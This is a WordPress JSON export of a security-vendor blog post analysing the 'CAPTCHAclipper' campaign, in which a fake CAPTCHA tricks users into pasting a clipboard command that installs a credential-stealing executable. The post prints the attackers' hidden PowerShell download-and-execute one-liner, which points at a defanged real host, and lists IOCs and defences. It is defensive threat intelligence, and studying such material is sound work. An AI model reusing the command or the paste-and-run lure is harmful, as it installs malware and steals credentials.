{"id":921,"date":"2024-11-28T08:37:00","date_gmt":"2024-11-28T08:37:00","guid":{"rendered":"https:\/\/conscia.com\/ie\/?p=921"},"modified":"2025-09-23T08:51:19","modified_gmt":"2025-09-23T07:51:19","slug":"from-captcha-to-compromise-analysis-of-captchaclipper","status":"publish","type":"post","link":"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/","title":{"rendered":"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper"},"content":{"rendered":"\n<p class=\" wp-block-paragraph\">Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">This attack, which we\u2019ve dubbed&nbsp;<strong>CAPTCHAclipper<\/strong>, exemplifies the convergence of social engineering and technical sophistication to compromise victims\u2019 systems and exfiltrate sensitive data.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">We observed the same TTPs in <strong>three distinct attacks<\/strong> over the course of one month, all within the European geographical region.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. 
The main payload is probably a variant of <a href=\"https:\/\/socradar.io\/malware-analysis-lummac2-stealer\/\"><strong>LummaC2 <\/strong>malware.<\/a><\/p>\n\n\n\n<p class=\" wp-block-paragraph\">When we first investigated the incident, the provided IOCs were not flagged as malicious, indicating the use of novel TTPs. However, as of the publication of this article, certain AV engines already recognize at least some of the IOCs, although these can easily be altered and repurposed.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">Below, we discuss the different stages of the attack chain.<\/p>\n\n\n\n<h2 class=\"wp-block-heading  wp-block-paragraph\">Analysis of Attack Chain<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Stage 1: The Malicious CAPTCHA Lure<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The attack began with a targeted lure: users were directed to a malicious but legitimate-looking website hosting a PDF file that the phishing lure invited them to download. Before being able to download the file, the victim was presented with an interactive CAPTCHA.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image1-1024x576.png\" alt=\"\" class=\"wp-image-4460\"\/><figcaption class=\"wp-element-caption\">Figure 1 \u2013 Legitimate-looking CAPTCHA is presented to victim<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">This initial step served a dual purpose:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>It established a layer of trust by mimicking legitimate verification methods.<\/li>\n\n\n\n<li>It initiated the first technical exploit via JavaScript, which we also recognize as the \u2018<a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/clickfix-deception-a-social-engineering-tactic-to-deploy-malware\/\">ClickFix<\/a>\u2019 or \u2018paste and run\u2019 technique.<\/li>\n<\/ol>\n\n\n\n<p class=\" wp-block-paragraph\">When users engaged 
with the CAPTCHA to access a promised PDF file, a malicious JavaScript payload silently executed in the background.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">This script copied a PowerShell command to the system clipboard, preparing the ground for the next stage:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -WindowStyle Hidden -Command \u201c$rQd=\u2018https:\/\/s3-scw-tx.b-cdn&#91;.]net\/prizev2&#91;.]txt\u2019; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;\u201d<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image2.png\" alt=\"\" class=\"wp-image-4461\"\/><figcaption class=\"wp-element-caption\">Figure 2 \u2013 HTML code shows embedded JavaScript that copies malicious command to clipboard<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading  wp-block-paragraph\"><strong>Stage 2: Social Engineering with Malicious Instructions<\/strong><\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">After completing the CAPTCHA, victims received a notification for verification steps before being able to download the file. 
In order to download it, the victim had to follow the provided instructions, which were critical to the attack\u2019s success.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Press\u00a0<strong>Win+R <\/strong>to open the Run dialog.<\/li>\n\n\n\n<li>Press <strong>CTRL+V<\/strong> to paste the clipboard command (unknowingly).<\/li>\n\n\n\n<li>Press Enter.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image\" id=\"attachment_22615\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image3.png\" alt=\"Figure 3 - Victim is presented with fake verification steps that lure them into initiating the attack chain\" class=\"wp-image-22615\"\/><figcaption class=\"wp-element-caption\">Figure 3 \u2013 Victim is presented with fake verification steps that lure them into initiating the attack chain<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">This seemingly benign command was, in reality, a carefully engineered delivery mechanism. It:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Downloaded a malicious script, <code>prizev2.txt<\/code>, from a remote server.<\/li>\n\n\n\n<li>Executed the script entirely in memory, bypassing file-based detections.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Stage 3: Deployment of Malicious Payload<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The downloaded script carried out multiple tasks to prepare for further exploitation:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Retrieved a ZIP file (prize.zip) from\u00a0<code>https:\/\/fixedzip.oss-ap-southeast-5.aliyuncs.com<\/code>.<\/li>\n\n\n\n<li>Extracted the ZIP file contents into a randomly generated folder within the\u00a0APPDATA\u00a0directory.<\/li>\n\n\n\n<li>Launched the executable <code>setup.exe<\/code>, initiating the attack\u2019s next phase.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image\" id=\"attachment_22614\"><img decoding=\"async\" src=\"https:\/\/conscia.com\/wp-content\/uploads\/2024\/11\/captcha_image4.png\" 
alt=\"Figure 4 - The main payload is dropped as Setup.exe in the APPDATA directory\" class=\"wp-image-22614\"\/><figcaption class=\"wp-element-caption\">Figure 4 \u2013 The main payload is dropped as Setup.exe in the APPDATA directory<\/figcaption><\/figure>\n\n\n\n<p class=\" wp-block-paragraph\">The use of the\u00a0<code>APPDATA<\/code>\u00a0directory ensured minimal visibility to routine security scans, emphasizing the actor\u2019s focus on evasion.<\/p>\n\n\n\n<h3 class=\"wp-block-heading  wp-block-paragraph\">Stage 4: Malicious Activities of Setup.exe<\/h3>\n\n\n\n<p class=\" wp-block-paragraph\">The executable&nbsp;<code>Setup.exe<\/code>&nbsp;was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Credential Theft: <\/strong>Extracting login credentials stored in browser files (Login Data) for different browsers at their typical file locations.<\/li>\n\n\n\n<li><strong>Reconnaissance: <\/strong>Identifying installed antivirus and endpoint protection software to evade detection or disable defenses.<\/li>\n\n\n\n<li><strong>Command-and-Control (C2) Communication: <\/strong>Establishing an outbound connection to\u00a0<code>21.4.107:443<\/code>, linked to the domain\u00a0<code>sliperyedhby.icu<\/code>. This connection facilitated data exfiltration and allowed further commands from the attacker.<\/li>\n\n\n\n<li><strong>Persistence Mechanisms: <\/strong>Registering itself in the <code>Windows Task Scheduler<\/code> for automatic execution after system reboots. 
Creating an additional file (69HT8K.pif), potentially as a decoy or a secondary stage.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators of Compromise (IOCs)<\/h2>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td colspan=\"2\">File Artifacts<\/td><\/tr><tr><td><strong>File Name<\/strong><\/td><td><strong>SHA-256<\/strong><\/td><\/tr><tr><td>Setup.exe<\/td><td>d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb<br \/>8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b<\/td><\/tr><tr><td>Autolt3.exe<\/td><td>1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td colspan=\"2\">Networking Artifacts<\/td><\/tr><tr><td><strong>Domains:<\/strong><\/td><td>https:\/\/s3-scw-tx.b-cdn[.]net<br \/>https:\/\/fixedzip.oss-ap-southeast-5.aliyuncs[.]com<br \/>https:\/\/dirverif.oss-ap-southeast-5.aliyuncs[.]com\/checkpoint\/finished\/gnerous.txt<br \/>sliperyedhby[.]icu<\/td><\/tr><tr><td><strong>IP Address:<\/strong><\/td><td>104.21.4.107<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Implications and Lessons Learned<\/h2>\n\n\n\n<p class=\" wp-block-paragraph\">The&nbsp;<strong>CAPTCHAclipper <\/strong>attack highlights a sophisticated, multi-layered approach to compromising systems:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>User Interaction as an Attack Vector: <\/strong>The reliance on user-driven actions (copy-pasting commands) exemplifies the effectiveness of social engineering.<\/li>\n\n\n\n<li><strong>Memory-Based Execution: <\/strong>Executing payloads in memory minimized detection by traditional antivirus solutions.<\/li>\n\n\n\n<li><strong>Persistence and Exfiltration: <\/strong>Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote 
control.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Effective Defense Strategies<\/h2>\n\n\n\n<p class=\" wp-block-paragraph\">The&nbsp;<strong>CAPTCHAclipper<\/strong>&nbsp;attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By leveraging social engineering and multi-stage infection techniques, attackers effectively bypass traditional defenses and exploit user trust.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\">To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach<strong>:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>User Awareness Training<\/strong>: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.<\/li>\n\n\n\n<li><strong>Enable Endpoint Detection and Response (EDR)<\/strong>: Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.<\/li>\n\n\n\n<li><a href=\"https:\/\/conscia.com\/service\/managed-services\/managed-security-services\/conscia-cyberdefense\/\"><strong>Employ continuous monitoring of security events<\/strong><\/a>: Deploying security solutions is not enough if you do not have analysts reviewing potential incidents. 
The timeliness of detection is crucial in these types of attacks as most of the attack chain is automated.<\/li>\n\n\n\n<li><strong>Restrict PowerShell Usage<\/strong>: Limit PowerShell execution to signed scripts only, and monitor PowerShell activity closely.<\/li>\n\n\n\n<li><strong>Network Monitoring and Data Leak Detection<\/strong>: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.<\/li>\n\n\n\n<li><strong>Incident Response Planning<\/strong>: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.<\/li>\n<\/ol>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can:<\/strong><\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Enhance Threat Hunting<\/strong>: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Collaborate and Share Intelligence<\/strong>: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.<\/p>\n\n\n\n<p class=\" wp-block-paragraph\"><strong>Report and Investigate<\/strong>: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses. 
The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":922,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"categories":[1],"global_solutions":[9,22],"global_partners":[],"global_industries":[25],"global_business_outcome":[43],"global_types":[],"class_list":["post-921","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","global_solutions-cybersecurity","global_solutions-threat-intelligence","global_industries-all-industries","global_business_outcome-security-operations"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v22.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia Ireland<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\" \/>\n<meta property=\"og:description\" content=\"Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The \u201cCAPTCHAclipper\u201d attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses. 
The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\" \/>\n<meta property=\"og:site_name\" content=\"Conscia Ireland\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-28T08:37:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-23T07:51:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Mikkel Elvej\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mikkel Elvej\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\"},\"author\":{\"name\":\"Mikkel Elvej\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e\"},\"headline\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\",\"datePublished\":\"2024-11-28T08:37:00+00:00\",\"dateModified\":\"2025-09-23T07:51:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\"},\"wordCount\":1080,\"publisher\":{\"@id\":\"https:\/\/conscia.com\/ie\/#organization\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/conscia.com\/ie\/blog\/from-captcha-to-compromise-analysis-of-captchaclipper\/\",\"url\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\",\"name\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper - Conscia 
Ireland\",\"isPartOf\":{\"@id\":\"https:\/\/conscia.com\/ie\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"datePublished\":\"2024-11-28T08:37:00+00:00\",\"dateModified\":\"2025-09-23T07:51:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#primaryimage\",\"url\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"contentUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/09\/recaptcha_606751718-hd.jpg\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/conscia.com\/blog\/from-captcha-to-compromise-new-captchaclipper-cyber-attack-exposed\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/conscia.com\/ie\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"From CAPTCHA to Compromise: Analysis of CAPTCHAclipper\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/conscia.com\/ie\/#website\",\"url\":\"https:\/\/conscia.com\/ie\/\",\"name\":\"Conscia 
Ireland\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/conscia.com\/ie\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/conscia.com\/ie\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/conscia.com\/ie\/#organization\",\"name\":\"Conscia Ireland\",\"url\":\"https:\/\/conscia.com\/ie\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png\",\"contentUrl\":\"https:\/\/conscia.com\/ie\/wp-content\/uploads\/2025\/08\/conscia_logo_tagline_black.png\",\"width\":994,\"height\":241,\"caption\":\"Conscia Ireland\"},\"image\":{\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/conscia-ireland\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/e65cdf0ee22f4931e48d2ae6c7943a5e\",\"name\":\"Mikkel Elvej\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/conscia.com\/ie\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/872c0da1fa238af642c0fd874f91c36aaa29e0d61ae46190532092637c9eeee4?s=96&d=mm&r=g\",\"caption\":\"Mikkel Elvej\"},\"url\":\"https:\/\/conscia.com\/ie\/blog\/author\/mhe\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. 
-->","_links":{"self":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/comments?post=921"}],"version-history":[{"count":2,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921\/revisions"}],"predecessor-version":[{"id":930,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/posts\/921\/revisions\/930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/media\/922"}],"wp:attachment":[{"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/media?parent=921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/categories?post=921"},{"taxonomy":"global_solutions","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_solutions?post=921"},{"taxonomy":"global_partners","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_partners?post=921"},{"taxonomy":"global_industries","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_industries?post=921"},{"taxonomy":"global_business_outcome","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_business_outcome?post=921"},{"taxonomy":"global_types","embeddable":true,"href":"https:\/\/conscia.com\/ie\/wp-json\/wp\/v2\/global_types?post=921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}